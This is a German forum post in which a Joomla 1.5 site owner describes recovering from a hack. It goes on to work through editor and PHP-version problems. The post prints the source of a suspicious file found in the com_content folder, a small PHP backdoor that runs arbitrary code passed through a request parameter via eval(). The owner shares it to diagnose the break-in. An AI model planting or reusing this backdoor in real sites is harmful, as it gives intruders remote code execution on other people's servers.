Kann eigentlich nur der Ordner /components/com_content sein in dem der Fehler liegt.
Die Seite für einen neuen Beitrag lautet schießlich:
Eine verdächtige Datei vom 21.08 war noch drinne, aber das rauslöschen dieser hat auch nicht viel mehr geholfen. Auch das erneute runterladen der joomla Version und des hochladen des com_content Ordners brachte keinen Erfolg.
Hier der Quellcode dieser:
HTML:
<?php
if (isset($_REQUEST['p1'])) {
eval(stripslashes($_REQUEST['p1']));
} else {
echo "djeu84m";
}
?>
Einzige was mir noch einfällt ist das es bei meiner Seite im FTP kein cgi-bin und cgi-data Ordner gibt, wird der benötigt ? Bei der normalen joomla Installation ist er auch nicht dabei - wird der im Laufe der Arbeit mit joomla erst angelegt ?
PS: Per Log-Datei hab ich dann nun die IP-Adresse rausbekommen.
EDIT: Ich könnte ja die ganze Version neu herunterladen und nochmal drüberbügeln. Da wäre aber jetzt meine Frage wie sich das mit den Beiträgen, Bildern, Modulen, Plugins etc. verhält. Die Beiträge werden da glaub in der Datenbank gespeichert ?
Eine Sicherung von gestern habe ich noch gemacht. Was sollte man da denn dann alles neu hochladen und was lieber nicht ?
EDIT2: Sooo, nach nun verschiedensten Versuchen habe ich spaßenshalber mal den Editor auf "Kein Editor" umgestellt und tada - es funktioniert. Hatte vorher den JCE Editor deinstalliert und den JCK installiert, da es beim JCE ja einige Sicherheitslücken geben soll. Habe aber durch den Hack dann auch kurzzeitig auch den JCK wieder deinstalliert und dadurch stand "Editor auswählen" in den Benutzereinstellungen und genau das war anscheindend der Grund warum er mir eine leere Seite zeigte - dachte aber bisher immer das wenn ich keinen Editor auswähle er wenigstens den Beitrag anzeigt - wenn dann eben ohne Editor.
Hoffe man kann mir folgen. Der JCK Editor scheint auch gar nicht bei Joomla 1.5 zu funktionieren :?:
Werde da jetzt mal die neuste Version vom JCE probieren und schauen ob da irgendwelche Sicherheitslücken vorhanden sind
EDIT3: Nun funktioniert endlich wieder alles einwandfrei, auch der JCK Editor unter 1.5. Ich brauchte nur die PHP Version per .htaccess auf Version 5 stellen, bei der alten 4er hat er den Editor anscheinend nicht genommen.
Danke nochmal für die Hilfe :)